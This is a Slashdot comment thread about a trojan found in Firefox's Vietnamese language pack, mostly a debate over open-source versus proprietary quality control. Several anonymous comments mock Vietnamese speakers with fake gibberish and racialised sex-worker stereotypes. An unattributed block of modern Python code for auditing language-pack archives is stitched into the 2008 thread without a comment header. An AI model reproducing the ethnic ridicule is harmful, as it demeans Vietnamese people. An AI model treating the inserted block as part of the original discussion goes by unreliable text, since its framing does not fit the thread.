
Firefox Vietnamese Language Pack Infected With Trojan

timothy posted more than 5 years ago | from the when-childhood-goes-wrong dept.


An anonymous reader writes "Wired.com is reporting that the Firefox browser has been unknowingly distributing a trojan with the Firefox Vietnamese language pack. Over 16,000 downloads of the pack have occurred since it was infected. This highlights a risk of relying on user-submitted Firefox extensions, or a lack of peer review of the extensions, many of which receive frequent upgrades."


200 comments

Some extensions get a lot of updates (0)

Anonymous Coward | more than 5 years ago | (#23336368)

I always wondered if there's a trojan when I see these +.0.0.0.1 updates to some extension I last used a zillion years ago. Now we know it could happen.

Have you ever *heard* Vietnamese? (-1, Troll)

Anonymous Coward | more than 5 years ago | (#23336382)

They're probably better off with the trojan.

Ming bong wong dong phong. Buerng shuer!

Mao. Mao! MAO!

Wang bong long.

UBUNTU!

MOD PARENT DOWN (2, Insightful)

SteveFoerster (136027) | more than 5 years ago | (#23336830)

This was modded funny? If OP had called them a derogatory term would it have been modded insightful? What a disgrace.

Micro$oft FTW!!!11!! (-1, Troll)

Anonymous Coward | more than 5 years ago | (#23336390)

This is why Open Source sucks! Long live Microsoft!

A rebuttal (3, Funny)

Bragador (1036480) | more than 5 years ago | (#23337030)

Your reasoning is flawed.

You are coming to the conclusion that open source "sucks" because a trojan was supplied with one version of Mozilla Firefox. The problem with that reasoning is twofold:

1) The problem was detected nonetheless

2) It is being fixed rather quickly

Another problem with your reasoning is that you jump to saying "Long live Microsoft!". While I applaud you for sharing your love, the link between a competitor's browser having a problem and your love of Microsoft is quite shallow.

For example, you could have said "long live Internet Explorer" and it would have made a bit more sense, but not that much. Indeed, you assume that because Firefox has a problem, the other browser has no problems of its own.

Also, why Microsoft? This is another flaw in your reasoning. There are Opera and Safari, for example. So exclusively backing Microsoft's product because of a problem with Firefox is a weak argument at best.

In conclusion, I state that we can't support your love of Microsoft solely based on your argument.

Thank you for your precious time.

Sincerely,

Me

Re:A rebuttal (1, Insightful)

Anonymous Coward | more than 5 years ago | (#23337200)

"1) The problem was detected nonetheless

2) It is being fixed rather quickly"

Yea, after 16,000+ downloads... doesn't seem quick enough to me.

Re:A rebuttal (1)

Bragador (1036480) | more than 5 years ago | (#23337438)

Problems don't identify themselves as problems. Humans must identify them first.

Also, 16,000 is not much compared to the millions of downloads of Firefox. In this context, it was quick. In a closed source project you can't even verify. For example, uTorrent might have a backdoor for the authorities and nobody would know until it's too late.

Re:Micro$oft FTW!!!11!! (-1, Troll)

Anonymous Coward | more than 5 years ago | (#23337136)

Zeig Hail

infected with Trojans? (5, Funny)

gEvil (beta) (945888) | more than 5 years ago | (#23336400)

So wait...It installs the Greek language pack?

Re:infected with Trojans? (3, Funny)

Yvan256 (722131) | more than 5 years ago | (#23336498)

Yes, and it adds the wooden rabbit [intriguing.com] font, too.

Re:infected with Trojans? (2, Funny)

pragma_x (644215) | more than 5 years ago | (#23336912)

Me, I'm already on the lookout for any updates with large wooden badgers.

Re:infected with Trojans? (1)

electrictroy (912290) | more than 5 years ago | (#23337474)

OH GOOD!

Firefox keeps begging me to update it, and I keep saying "no" "no" "no". Glad I followed that procedure rather than download a trojan.

Re:infected with Trojans? (4, Funny)

betterunixthanunix (980855) | more than 5 years ago | (#23336532)

I guess I was the only one who thought "infected with trojans" was funny. Especially since many of the condoms I've seen are made in south Asia.

Ahhh, me so solly (0)

Anonymous Coward | more than 5 years ago | (#23337198)

Me so solly me infect Vietnamese ranguage pack with Trojan. Me sucky sucky boom boom rong time!

Full metal Jacket (0, Flamebait)

UberHoser (868520) | more than 5 years ago | (#23336402)

Me so horney
Me love you longtime
You got Trojan ?
Me love you longtime !!!!!

Re:Full metal Jacket (-1, Troll)

Anonymous Coward | more than 5 years ago | (#23336564)

No, No Nooooo, toooo big!

Genuine Alabama Black Snake.

Downside of OSS (4, Interesting)

elrous0 (869638) | more than 5 years ago | (#23336412)

I know this isn't going to be a popular opinion here, but two of the big downsides of open source software to me are the lack of documentation and the lack of quality control. Sure, OSS has THEORETICAL quality control (because anyone can review it), but how often does that REALLY happen? If someone slipped a virus into some OSS program (especially easy if they distribute it as a binary), how long, if ever, would it be before anyone caught it?

I'm not saying commercial software is perfect in that regard (there have been cases of commercially distributed software containing malware too), but at least there is generally some level of quality control there.

Re:Downside of OSS (-1, Flamebait)

Anonymous Coward | more than 5 years ago | (#23336484)

And your point would be... what? It seems to me that you just like hearing yourself talk because you are not making a particular case for free software nor commercial software. All you said is both can be infected with malware.

Re:Downside of OSS (0)

Anonymous Coward | more than 5 years ago | (#23336596)

B-b-b-ut Microsoft... ZOMGBILLGATES! You closed-source fascist bastard! Open freedom sores, goddammit!

HOW COULD YOU!

Re:Downside of OSS (5, Insightful)

ericlondaits (32714) | more than 5 years ago | (#23336748)

I guess the point is: "the fact that anyone could check the source code at any time should not replace proper QA, which shouldn't be all that different from the one done on commercial software".

I'm sure that Firefox has quite a bit of QA done to it... but its usefulness relies too much on extensions, which we don't have that many assurances about.

Re:Downside of OSS (2, Informative)

Uncle Focker (1277658) | more than 5 years ago | (#23336792)

I'm guessing you didn't read the article. The breakdown came with the fact that the signature of the trojan was unknown at the time it was uploaded and so the anti-virus scan on the extension came up clean. This had nothing to do with a failure of OSS but with the fact that at the time it was an unknown trojan.

Re:Downside of OSS (2, Insightful)

Fourier404 (1129107) | more than 5 years ago | (#23337160)

Except if a person had actually tested it, it would have become pretty obvious that something was wrong.

Re:Downside of OSS (2, Insightful)

Uncle Focker (1277658) | more than 5 years ago | (#23336502)

The virus's signature was unknown at the time, and thus passed Mozilla's testing of add-ons.
Monster fucking fail.

Re:Downside of OSS (2, Interesting)

ttapper04 (955370) | more than 5 years ago | (#23336522)

You are right. It may have something to do with the responsibility a software company has when selling you code. There are flaws in this statement, but what I mean is this:
Joe Six-pack is not going to be as upset when he gets infected by the free thing vs. the thing he had to pay for.
Is this fair to say? Can anyone say that better than me?

Re:Downside of OSS (2, Insightful)

Henry V .009 (518000) | more than 5 years ago | (#23336612)

Yeah. When the hackers steal his identity and ruin his credit, he'll just be cool about it and say "Well, I still love Firefox; I got hacked, but it's not like I had to pay money for this software!"

Re:Downside of OSS (2, Insightful)

kilgortrout (674919) | more than 5 years ago | (#23336544)

If someone slipped in a virus into some OSS program (especially easy if they distribute it as a binary), how long, if ever, would it be before anyone caught it?
Less than three months according to the article.

Re:Downside of OSS (4, Interesting)

jrumney (197329) | more than 5 years ago | (#23336662)

In fact, it is more like less than one month, since the other two months is attributable to the delay in anti-virus vendors recognizing the trojan.

Re:Downside of OSS (3, Funny)

Uncle Focker (1277658) | more than 5 years ago | (#23336728)

So was Mozilla using a proprietary anti-virus software? Better hope not, or the ggp is going to have his entire point demolished.

Re:Downside of OSS (2, Insightful)

Uncle Focker (1277658) | more than 5 years ago | (#23336548)

but at least there is generally some level of quality control there
Hahahahahahaha. You must not deal with much proprietary software to make such hilarious statements. In fact, in my experience the statement is just the opposite.

Re:Downside of OSS (2, Interesting)

dave420 (699308) | more than 5 years ago | (#23336994)

No, the "hahaha" is on you, if you think proprietary software has no quality control. It has plenty. So does Open Source software. When you spend money on a closed-source package, chances are that software house has a QA department. I don't mean to be rude to anyone or piss anyone off, but the same can't be said for most OSS projects, apart from those released through the few large OSS houses that have their own QA departments. Just because you've found bugs in closed-source software doesn't mean they don't have QA. The fact that they do have QA demonstrates you're wrong on that. People find bugs in open-source software, too - by your logic, OSS is just as bad as closed-source. Great jerrrb.

Re:Downside of OSS (0)

Anonymous Coward | more than 5 years ago | (#23337100)

What the fuck are you talking [gentoo.org] about [mozilla.org]?

Re:Downside of OSS (1, Insightful)

Uncle Focker (1277658) | more than 5 years ago | (#23337268)

No, the "hahaha" is on you, if you think proprietary software has no quality control.
Good thing I never made such a proclamation. If you think I did please quote the relevant section.

It has plenty.
By plenty, you mean the bare minimum? Cause that's what happens in almost every case.

When you spend money on a closed-source package, chances are that software house has a QA department.
So? If someone slips in a trojan into their software that is undetectable to their virus scanners, as was the case here, how exactly is that big bad QA department going to prevent it from being released? Oh, you mean it won't?

I don't mean to be rude to anyone or piss anyone off, but the same can't be said for most OSS projects, apart from those released through the few large OSS houses that have their own QA departments.
And yet most of these projects without a QA department are still able to make software of quality rivaling these proprietary vendors. A fact that was acknowledged by Microsoft themselves in private emails. Kind of makes it rather pathetic that with those big QA departments, in most cases they are only marginally better than their OSS rivals, no?

Just because you've found bugs in closed-source software doesn't mean they don't have QA.
Repeating yourself again? I never made the claim and you'll never find a quote where I said so.

The fact that they do have QA demonstrates you're wrong on that.
Wrong on what? You're attacking a strawman. Please provide the direct quote where I say any proprietary vendor has no QA department.

People find bugs in open-source software, too - by your logic, OSS is just as bad as closed-source. Great jerrrb.
Again, attacking a strawman. Nothing in there is "my" logic. It's just you attempting to put words in my mouth.

Re:Downside of OSS (0)

Anonymous Coward | more than 5 years ago | (#23337582)

No, the "hahaha" is on you, if you think proprietary software has no quality control.
Good thing I never made such a proclamation. If you think I did please quote the relevant section.

I'm not the gp, but here:

but at least there is generally some level of quality control there ["there" meaning "in commercial software"]
Hahahahahahaha. You must not deal with much proprietary software to make such hilarious statements. In fact, in my experience the statement is just the opposite.

So your experience is "the opposite" of "there is generally some level of quality control in commercial software", which would be "there is generally no level of quality control in commercial software".

Re:Downside of OSS (1)

Kent Recal (714863) | more than 5 years ago | (#23337312)

When you spend money on a closed-source package, chances are that software house has a QA department.

So, having a QA department makes better software? Someone at Microsoft must have missed the memo...

Re:Downside of OSS (4, Insightful)

Keyper7 (1160079) | more than 5 years ago | (#23336562)

Open source allows greater quality control than closed source. If Mozilla did not use this potential, it's their fault and not the open source process'. In fact, the problem here is that the quality control used by Mozilla was not open source enough. They only did automatic scanning, something that can be done on compiled binaries, when a simple code check (notice that an extension source is not that big) would have caught the malicious code rather quickly.
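The point above, that a signature scan says nothing about whether a package contains what its type promises, can be made concrete with a structural check. The following Python is an added example written for this thread; it is not Mozilla's review tooling and it is not code from the Wired article or any poster. The allowlist of member types, the executable magic bytes and the two sample packs are assumptions constructed for the demonstration: a locale package should consist of entity and property files plus registration metadata, so anything else in the archive (a native binary, a page carrying script, a member of unknown type) is surfaced for a human to read, no signature database required.

```python
import io
import zipfile
from dataclasses import dataclass
from pathlib import PurePosixPath

# Assumed allowlist: the member types a Firefox-era language pack legitimately
# carries (locale strings, registration metadata, nested chrome jars). Anything
# outside it is not necessarily malicious, but it is what a reviewer should read.
ALLOWED_SUFFIXES = {".dtd", ".properties", ".rdf", ".manifest", ".jar", ".css", ".txt"}

# Leading bytes of PE, ELF and Mach-O images. A locale pack has no reason to
# contain native code, so these are flagged regardless of the file extension.
EXECUTABLE_MAGIC = (b"MZ", b"\x7fELF", b"\xca\xfe\xba\xbe",
                    b"\xfe\xed\xfa\xce", b"\xfe\xed\xfa\xcf", b"\xcf\xfa\xed\xfe")


@dataclass(frozen=True)
class Finding:
    path: str    # member path; nested jar members are written as outer.jar!/inner
    reason: str


def audit_langpack(xpi_bytes: bytes, prefix: str = "") -> list[Finding]:
    """Walk every member of a language-pack XPI (a zip) and report anything a
    pure locale package should not contain. Nested .jar members are descended."""
    findings: list[Finding] = []
    with zipfile.ZipFile(io.BytesIO(xpi_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            path = prefix + info.filename
            suffix = PurePosixPath(info.filename).suffix.lower()
            data = zf.read(info)

            if suffix not in ALLOWED_SUFFIXES:
                findings.append(Finding(path, f"unexpected file type {suffix or '(none)'}"))

            if suffix == ".jar":
                # Chrome packages are zips inside the zip; audit their contents
                # rather than pattern-matching the container bytes.
                if zipfile.is_zipfile(io.BytesIO(data)):
                    findings.extend(audit_langpack(data, prefix=path + "!/"))
                else:
                    findings.append(Finding(path, "jar member is not a zip archive"))
                continue

            if data.startswith(EXECUTABLE_MAGIC):
                findings.append(Finding(path, "native executable header"))

            # Locale strings are entities and key=value lines; markup that
            # executes does not belong in them. Only the first 64 KiB is scanned.
            head = data[:65536].lower()
            if b"<script" in head or b"javascript:" in head:
                findings.append(Finding(path, "embedded script content"))
    return findings


def build_sample_xpi(with_payload: bool) -> bytes:
    """Constructed sample (not a real add-on): a minimal vi language pack, optionally
    with two stand-in members that should never appear in a locale package."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as jar:
        jar.writestr("locale/vi/browser/browser.dtd",
                     '<!ENTITY mainWindow.title "Mozilla Firefox">\n')
        jar.writestr("locale/vi/browser/browser.properties",
                     "tabs.closeWarningTitle=Confirm close\n")
        if with_payload:
            # Stand-in: a page carrying script where only locale strings belong.
            jar.writestr("locale/vi/browser/help.html",
                         "<html><body><script>/* constructed placeholder */</script></body></html>")
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as xpi:
        xpi.writestr("install.rdf", '<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#"/>\n')
        xpi.writestr("chrome.manifest", "locale browser vi jar:chrome/vi.jar!/locale/vi/browser/\n")
        xpi.writestr("chrome/vi.jar", inner.getvalue())
        if with_payload:
            # Stand-in: a PE header with no code behind it.
            xpi.writestr("chrome/update.exe", b"MZ" + b"\x00" * 62)
    return outer.getvalue()


if __name__ == "__main__":
    for label, payload in (("clean pack", False), ("tampered pack", True)):
        print(f"{label}:")
        for f in audit_langpack(build_sample_xpi(payload)):
            print(f"  {f.path}: {f.reason}")
```

The clean sample produces no findings; the tampered one reports the HTML member twice (wrong type, script content) and the executable twice (wrong type, PE header). The check is deliberately cheap and content-agnostic: it does not try to decide whether a member is malicious, only whether it belongs in a package of this kind, which is exactly the question a signature scanner never asks.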

Re:Downside of OSS (0)

Anonymous Coward | more than 5 years ago | (#23336980)

Have you seen the obfuscation contests that hackers have? I know I was surprised at how easily code can look OK but have a purpose-built flaw in it (a signedness problem, for instance). Unless you really know the code very well you probably wouldn't catch something like that, which can be exploited if it's in the right place.

Re:Downside of OSS (3, Insightful)

dave420 (699308) | more than 5 years ago | (#23337070)

Open source means the QA can be shifted from a group of QA workers in an office to people who use the software. Both approaches work, and both are not perfect. Saying one is inherently better than the other is a bit strange, as they both achieve the same thing, only in different places. QA performed in-house has access to the source code, and can highlight errors and get them fixed, just the same as any OSS project. The only difference is the QA workers are getting paid for it, and are working directly with the developers. I'm not saying that's better, it's just what happens.

Re:Downside of OSS (5, Insightful)

peragrin (659227) | more than 5 years ago | (#23336574)

right quality control in closed source. bullshite.

How many refurbished iPods have had viruses on them? How many USB thumb drives with custom controls and drivers have had viruses on them? How many times has MSFT released a service pack only to pull it a day or two later because 50% of the installs would fail horribly?

OSS has a far better track record on quality control. Even better, OSS software knows exactly how many times it has been downloaded and releases the exact date at which the infection happened. That is information that is NEVER released by closed source companies.

OSS is far from perfect, but it has a much better track record than closed source software. And when it does fail, everything about the failure is spelled out in detail so that particular failure is less likely to happen again. Unlike closed companies, whose own management don't even know what really happened.

Re:Downside of OSS (1)

urcreepyneighbor (1171755) | more than 5 years ago | (#23336776)

How many refurbished iPods have had viruses on them? How many USB thumb drives with custom controls and drivers have had viruses on them? How many times has MSFT released a service pack only to pull it a day or two later because 50% of the installs would fail horribly?
Yeah, see, but... you can hold companies responsible. Who will be held responsible for this trojan? Hm? With the Sony rootkit, we knew. With OSS, "some guy that posted it" just doesn't cut it.

Re:Downside of OSS (1)

BlueLightning (442320) | more than 5 years ago | (#23337104)

Yeah, and just see how far you get with a liability claim against almost any proprietary software vendor. They will just point to their EULA, which you must have agreed to in order to use their software, that disclaims any and all liability on their part. So you can't really hold them responsible, not in a legal sense.

Re:Downside of OSS (1)

Sancho (17056) | more than 5 years ago | (#23337210)

You can still sue them and ask to have that portion of the EULA stricken as unenforceable.

Re:Downside of OSS (0)

Anonymous Coward | more than 5 years ago | (#23337298)

Yeah, but the MPL, GPL, etc. all have that same type of clause in their license.

So you could do the same to Mozilla. However, either way, proprietary or OSS, you're going to have a tough battle on your hands.

Re:Downside of OSS (1)

Sancho (17056) | more than 5 years ago | (#23337406)

I wasn't suggesting otherwise--I was just responding to the person who thought that EULAs could disclaim liability of proprietary software companies.

Re:Downside of OSS (1)

dave420 (699308) | more than 5 years ago | (#23337094)

Using a few examples of flawed QA to claim all closed-source QA doesn't happen is a ridiculous argument. I could point out how many flaws are introduced in updates to open-source software, and use your logic to say OSS has no QA. OSS has enough merits to guarantee it a very glorious future - we don't have to make stuff up or sensationalise problems both camps go through to distort reality. FUD - I thought we didn't like that here.

Re:Downside of OSS (2, Insightful)

cyfer2000 (548592) | more than 5 years ago | (#23336586)

So company- or organization-supported OSS projects with proper QA are the solution.

Re:Downside of OSS (3, Interesting)

RiotingPacifist (1228016) | more than 5 years ago | (#23336620)

The Downside is when the project gets too big, the number of users >>> developers so resources get stretched to try and satisfy the large number of users and the quality of the project drops.

Re:Downside of OSS (2, Insightful)

TheVelvetFlamebait (986083) | more than 5 years ago | (#23336640)

Open Source should be treated with care, just like any other software you download from the net. Stick to the lighted paths and generally you should be fine. In this case, we have user-generated code which can be iffy, but you can feel fairly safe if it has been downloaded and used a number of times. These things usually come out into the open sooner or later.

Re:Downside of OSS (1)

maxume (22995) | more than 5 years ago | (#23336678)

How does the word "commercial" do anything to ensure a higher level of quality control than the word "open"? Here's a hint: it doesn't.

I certainly trust IBM and Sun (wearing their closed source hat) and Microsoft and Intel to have a certain level of quality control, but I don't really expect Red Hat or Sun (wearing their open source hat) to have any lower level of quality control, so to some extent, it's a false dichotomy.

It goes further than that though, I don't really expect anything of a company that I have never heard of or dealt with, they need to demonstrate that they have some level of quality control, not say "we're commercial" in order to gain any trust.

Re:Downside of OSS (1)

ericlondaits (32714) | more than 5 years ago | (#23336856)

The difference is that in the closed source world something as basic as a language pack would come with the same QA as the program... while Firefox doesn't give much assurance beyond what they directly produce, although the value of the product is directly connected to the availability of third party extensions.

In the same way, I'm pretty sure that the Ubuntu or Red Hat guys are giving me a good kernel and core libraries with their distro... but I find it hard to believe that any serious QA is done on the huge amount of packages that are distributed with any average distro... especially given that many of those don't hide the fact that they are experimental or beta-quality (when I had an ADSL connection that used PPPoA [PPP over ATM] the only Linux package that supported this was slightly less than beta).

Re:Downside of OSS (1)

Uncle Focker (1277658) | more than 5 years ago | (#23336910)

The difference is that in the closed source world something as basic as a language pack would come with the same QA as the program... while Firefox doesn't give much assurance beyond what they directly produce, although the value of the product is directly connected to the availability of third party extensions.

The virus's signature was unknown at the time, and thus passed Mozilla's testing of add-ons.

Mozilla ran an anti-virus check on the most recent version in February when it was added to the official Firefox add-ons site, but the Trojan's virus signature was not known until April.
So basically according to you Mozilla is supposed to be able to recognize trojans whose signatures are unknown to any anti-virus software?

Re:Downside of OSS (1)

ericlondaits (32714) | more than 5 years ago | (#23337180)

Running third party software through an antivirus is not QA.

I don't even begin to understand how a trojan can be slipped inside a LANGUAGE pack.

Re:Downside of OSS (0)

Anonymous Coward | more than 5 years ago | (#23337308)

So basically you're saying that a virus scanner is a proper substitute for putting actual eyes on code??

That sure seems like what you are saying since you seem to be solely blaming the virus scanner.

Re:Downside of OSS (1)

Uncle Focker (1277658) | more than 5 years ago | (#23337382)

So basically you're saying that a virus scanner is a proper substitute for putting actual eyes on code??
No, but it's no less checking than Opera does for the 3rd party add-ons they host for their proprietary browser. If I were to create a trojan and upload it to Opera's site and it bypasses any virus scans, is that somehow the fault of the proprietary business model? No. It's just the fact that sometimes you can't always check everything. Especially when a group gets thousands upon thousands of these 3rd party add-ons submitted.

That sure seems like what you are saying since you seem to be solely blaming the virus scanner.
Nope, it's just you putting words in my mouth.

Re:Downside of OSS (0)

Anonymous Coward | more than 5 years ago | (#23337410)

I worked on a (commercial) product that could do just that. So they just picked the wrong software.

Re:Downside of OSS (1)

Uncle Focker (1277658) | more than 5 years ago | (#23337464)

So they just picked the wrong software.
You mean except for the fact that none of the anti-virus software out at the time could detect the trojan? Did you even read the part where it said that the trojan signature wasn't known about until 2 months later?

Re:Downside of OSS (1)

maxume (22995) | more than 5 years ago | (#23336974)

Opera sidesteps the problem of QAing their Vietnamese language pack by not having one:

http://www.opera.com/download/languagefiles/ [opera.com]

(I'm not trying to slam Opera here)

Certainly with open source you need to understand who is providing what, but the open source part isn't the problem, the who is the problem, just like with anything else.

Re:Downside of OSS (0)

Anonymous Coward | more than 5 years ago | (#23336700)

You do realize that it's just as easy to have put a virus into an add-on for a proprietary browser as well, right? Explain to me exactly how for no other reason than being closed-source does that attack vector get closed for software like IE or Opera? Oh, you mean it doesn't? Yeah, you're just spreading FUD.

Re:Downside of OSS (5, Insightful)

JustinOpinion (1246824) | more than 5 years ago | (#23336718)

To be fair, this particular sequence of events could have happened to a proprietary product as well. The article explains that an add-on developer uploaded a new version of the language pack. The language pack was automatically scanned for viruses, and found to be clean (since the signature for this particular Trojan wasn't yet known). It appears that this occurred because the developer's computer was infected (i.e.: this was accidental, not intentional, on the part of the contributor).

This isn't too different from a hypothetical employee whose home computer is infected, and who is working from home and emails a module to his boss, who merges it into the final product. If his home computer was infected, and the standard virus scans missed it, then the final product could end up having Trojan code buried inside.

Would the company necessarily have caught the Trojan? Doubtful. They, too, would probably not have done a line-by-line review of each module update that is submitted.

So I'm not convinced this can be pointed to as a failing of the OSS development model per se. The only difference is that the OSS user contributor is perhaps less well-known (less trustworthy?) to the distributors than in a corporate setting. (But, again, this wasn't a problem of trust... this was a contributor machine being infected. And I assure you that corporate developers can and do get their machines infected.)

Nevertheless, this points to a breakdown in Mozilla's auditing practices. They should be very careful with any code they distribute. But these kinds of quality-control breakdowns occur in OSS projects and corporations, too. (One could tangentially argue that at least with OSS, breaches are likely to be publicized, whereas companies will frequently try to suppress information that points out a security breach.)

Re:Downside of OSS (4, Informative)

Paradise Pete (33184) | more than 5 years ago | (#23336730)

I'm not saying commercial software is perfect in that regard (there have been cases of commercially distributed software containing malware too), but at least there is generally some level of quality control there.

Creative MP3 players ship with virus [theregister.co.uk]
Apple Ships iPods with Windows Virus [betanews.com]
Seagate Storage Units Ship with Virus [eweek.com]
Sega Dreamcast console game spreads virus [findarticles.com]
Maxtor USB Hard Drives Ship Virus Infected [everythingusb.com]
Digital photo frames ship with computer virus [itrportal.com]
Sony Ships Rootkit [schneier.com]

Re:Downside of OSS (1)

Hatta (162192) | more than 5 years ago | (#23336738)

Nice troll. There are 34 comments on this article, and 13 of them are in response to your post. That's over 1/3 of the discussion so far. Excellent work.

Re:Downside of OSS (1)

elrous0 (869638) | more than 5 years ago | (#23336814)

Since the popular definition of troll seems to be "Anyone who posts anything that I disagree with," I shall label you a troll as well.

Re:Downside of OSS (1)

Uncle Focker (1277658) | more than 5 years ago | (#23336872)

No, the definition of a troll is someone who posts inflammatory material in order to get responses, which is what you did. Your anti-OSS FUD has little bearing when it comes to the actual reality of this case. The problem was with the fact that this trojan had an unknown signature and thus was able to slip past the virus scanner being used by Mozilla. And here's the real kicker: proprietary anti-virus scanners, the stuff you are trying to claim is the pinnacle of software QA, didn't know about it till March.

Re:Downside of OSS (0)

Anonymous Coward | more than 5 years ago | (#23336740)

You forget that OSS and commercial software are not mutually exclusive.

It's true that the archetypal OSS project with a single founder and a loose developer community may lack formal quality control, but there also exist many OSS projects funded or even founded by companies which do have formal procedures for QA.

As an OSS project matures, its development process also tends to improve, and while slips like this can never be completely prevented, it's unfair to make sweeping statements like yours.

Whether a given piece of software is OSS or proprietary has no inherent effect on its quality. Because the OSS development process is naturally more open, the problems that every software project has (some more than others, though) are more visible. This is emphasised by the "release early, release often" development model which is common in OSS projects.

In the end, it's up to the user to evaluate the strengths and weaknesses of a product, and this applies equally to both OSS and proprietary software.

Re:Downside of OSS (1)

Zero__Kelvin (151819) | more than 5 years ago | (#23336834)

"Sure, OSS has THEORETICAL quality control (because anyone can review it), but how often does that REALLY happen? If someone slipped in a virus into some OSS program (especially easy if they distribute it as a binary), how long, if ever, would it be before anyone caught it?"
Sure, proprietary software has THEORETICAL quality control (because they are charging for it), but how often does that REALLY happen? If someone slipped in a virus into some proprietary program (which they, of course, only distribute as a binary), how long, if ever, would it be before anyone caught it?

So that particular "downside" of F/OSS is also a "downside" with proprietary software (which means of course that you have labeled something as a downside that is in fact not one - thus the quotes), with the difference being that there is the upside with F/OSS that you, the consumer, can do your own QC if you so desire, and others are likely to do it for you if you don't.

Hmmmm ... I'll take the OSS "downside" over the proprietary "downside" any day!

Re:Downside of OSS (0)

Anonymous Coward | more than 5 years ago | (#23337580)

No... The problem with OSS is that ANYONE can download it and put ANYTHING in the source they want in it. And if someone accepts the patch as valid, then it's in, exploit, virus, trojan or whatever, it's in. Yea, people CAN look at the code, but how many people DO? How many people would even know what they are looking at if they did?

All those eyes staring at source code sure seemed to help this time, eh? 16,000 infected DL's? Obviously no one in the OSS community, where everyone magically knows how to read and understand source code, looked at this code. Oh yea, it's all the virus scanner software's fault. The virus scanner reported to them there was no need to look at the code? (/me imagines the virus scanner waving its arm and doing some kind of Jedi mind trick...)

You know if this had been Microsoft y'all would be calling for jail time for someone for gross negligence.

Now, when is the last time MS or Oracle or, well you get the idea, let you DL their (non-open) source code and submit patches to them?

See, MS and all the rest actually PAY their people to do work, so what is the incentive for THEM to insert something malicious and potentially lose their job or worse?

Who paid that guy that submitted the OSS patch with malicious code? Is he worried about losing his job over this? Oh, you mean he has no fear of repercussions? Well, why would anyone ever do something they weren't afraid of doing... wait... what?

Re:Downside of OSS (2, Insightful)

_Sprocket_ (42527) | more than 5 years ago | (#23336906)

I'm not saying commercial software is perfect in that regard (there have been cases of commercially distributed software containing malware too), but at least there is generally some level of quality control there.

Quality control fails in the proprietary software world (aside - OSS is commercial as well) but hey... at least it's there! Meanwhile, this particular case is supposed to be an example of how OSS has no quality control? And we see the same failures in the quality-controlled proprietary world? I'm not following your logic.

You ask how long it would take to find a virus slipped into an OSS program? Interesting question. A little bit of Googling would show where major OSS projects were compromised and malicious code was discovered and cleaned within a rather short period of time. Of course - that's not quite a virus. One of the ELF infecting viruses made its rounds by being attached to a supposed exploit and being tossed out into the community. That had a short run. Although I wouldn't quite classify this as an OSS example. The interesting thing here is that for an environment that you claim lacks quality control, there's something going on that's catching this stuff.

Re:Downside of OSS (1)

kdemetter (965669) | more than 5 years ago | (#23337010)

I know this isn't going to be a popular opinion here, but two of the big downsides of open source software to me are the lack of documentation and the lack of quality control. Sure, OSS has THEORETICAL quality control (because anyone can review it), but how often does that REALLY happen? If someone slipped in a virus into some OSS program (especially easy if they distribute it as a binary), how long, if ever, would it be before anyone caught it?

I'm not saying commercial software is perfect in that regard (there have been cases of commercially distributed software containing malware too), but at least there is generally some level of quality control there.

Actually, that is incorrect. The entire nature of open source forces it to make sure peer review is enforced, because of the danger.

In closed source this can happen just as easily, but the control will be more relaxed because they think it will be safer.

Just look up AES, and you will know it is possible.

Re:Downside of OSS (1)

Omnifarious (11933) | more than 5 years ago | (#23337140)

If you had ever worked for a closed source software maker you wouldn't be talking about the quality control in closed source.

Yes, I agree that having a trojan slipped in is a little less likely as it would require a malicious employee rather than a malicious random contributor. But the quality of the code is utterly and horribly abysmal. For every trojan that doesn't make it in there must be at least 500 security bugs that make it out because of the horrible quality control of closed source.

The software industry is currently in worse shape than Detroit auto manufacturers in the 70s. Way worse shape.

Re:Downside of OSS (1)

value_added (719364) | more than 5 years ago | (#23337448)

I know this isn't going to be a popular opinion here, but two of the big downsides of open source software to me are the lack of documentation and the lack of quality control.

I'll refrain from asking what you mean by quality control, but documentation? Seriously? Outside of OSS, you'd be hard pressed (with a few exceptions) to find anything that has any meaningful documentation. And if you're looking for hand-holding HowTo's or FAQs, well, the web is littered with them.

Windows, for example, offers little more than beginner-oriented help files and a collection of goofy wizards. If I'm looking for documentation, my choices are subscribe to MSDN/Technet, spend my time trawling the Microsoft site, use the trial-and-error approach to "guess" what's happening or how things work, or dick around with Google. By comparison, a typical Ubuntu system probably has more than a typical user would ever want or need. If you use FreeBSD, the Handbook covers all topics, and the manpages document everything in its entirety. If you need more than that, well, the code is readily available and the tools are at your disposal to find what you need in seconds.

The reason why the expression RTFM is never heard in the Windows world is that there generally is no manual to read. That, and the fact that the eleventy million mailing lists dedicated to OSS don't exist, precluding anyone from using the expression.

Re:Downside of OSS (1)

hunteke (1172571) | more than 5 years ago | (#23337454)

two of the big downsides of open source software to me are the lack of documentation

Proof, please. Documentation is highly dependent on a number of things, not the least of which is the projects you use. This is true in any paradigm, OpenSource, proprietary, something-you-bought-at-Walmart, or any other project. For instance, from my point of view (as all things are, eh?) Postgres [postgresql.org] has absolutely excellent documentation. Not only does it describe options, tools, and how to set up and use Postgres, but it gives you context, like when one should consider a certain setup or action, what known bugs/caveats exist, and even the core concepts of lots of problems. It is so good, in fact, that even when I use other database products, I quite often will find myself using the Postgres documentation to help me understand how to better solve my problem with the other database.

Now juxtapose Postgres' documentation with, say, that of OpenOffice. The OpenOffice documentation has the advantage of context sensitive help. Whenever I click a help button, it doesn't just point me to "the docs", but it opens up the exact page and scroll position of where I should start reading. However, its documentation is not quite as thorough as Postgres. I will often have to do some experimentation before I understand exactly what I've messed up or need to do.

And finally, for a third example, take a look at Mozilla Thunderbird. It doesn't even include help (at least my copy of it through Gutsy), but points me back to the website (via the Help menu). Perusing the website, the best documentation I see is a series of Howto's for different specific tasks. Not very thorough.

Saying that OpenSource documentation "sucks" [paraphrased] is inaccurate and way too general. It also attempts an untrue quality distinction from proprietary software. Have you ever had to deal with Microsoft errors? For example, the Windows Update Tool (via Internet Explorer) will sometimes fail, and yields merely a diagnostic code. So, you put the code in the search, and the documentation is a sparse help page saying that the update may have failed for one of a few reasons. The usual suggestion is to reboot and try again. You do so, and get the same error message. I'm not saying anything about the quality of the product, but of the unhelpful documentation from a proprietary company. (I have plenty of other proprietary-documentation-sucks examples if you'd really like.)

